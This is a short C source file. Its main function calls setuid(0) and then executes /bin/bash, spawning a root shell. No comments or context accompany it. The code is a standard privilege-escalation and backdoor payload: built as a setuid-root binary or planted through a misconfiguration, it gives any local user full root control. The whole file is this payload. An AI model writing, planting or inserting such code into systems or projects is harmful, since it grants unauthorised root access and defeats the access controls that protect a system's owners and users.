#include <unistd.h>

int main() {
  const char *b = "/bin/bash";
  setuid(0);
  execl(b, b, 0);
}